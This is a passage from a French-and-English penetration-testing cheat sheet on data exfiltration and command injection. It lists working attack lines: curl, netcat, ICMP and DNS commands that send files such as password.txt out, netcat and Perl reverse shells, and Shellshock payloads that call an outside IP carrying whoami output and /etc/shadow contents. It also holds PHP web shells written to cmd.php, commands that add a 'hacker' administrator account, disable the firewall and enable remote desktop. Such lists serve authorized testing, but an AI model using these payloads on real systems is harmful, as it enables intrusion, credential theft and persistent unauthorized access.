Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([https://requestcatcher.com/])

==== cURL ====
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php
$ curl -d "@file" -X POST http://domain.com

==== cURL avec FTP ====
$ curl -T file ftp://ip -user nick:pass

==== Netcat ====
$ nc -l -p {port} < {file to extract}

==== ICMP ====
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.

Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done

Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.

==== DNS ====
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done
for i in $(cat password.txt); do host $i.hkj.com; done

Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.

==== Time based data exfiltration ====
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

==== Reverse Shell ====
Avec Netcat:
nc -L -p port -e cmd.exe (Windows)
nc -l -p port -e /bin/bash (*nix)

===== Se connecter =====
====== Netcat ======
$ nc {ip} {port}
$ nc {ip} {port} > output

(Windows)
type {file to extract} | nc -L -p {port}

====== wget ======
wget --post-data exfile=`cat /path/to/file` http://domain.com
wget --post-file file http://domain.com

====== Telnet ======
telnet ip port < file

=== Command Injection/Execution Cheat Sheet ===
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands

#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
===== Unix =====




/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}



system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>

===== Windows =====
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d

%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
system('cat C:\boot.ini');
system('cat config.php');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
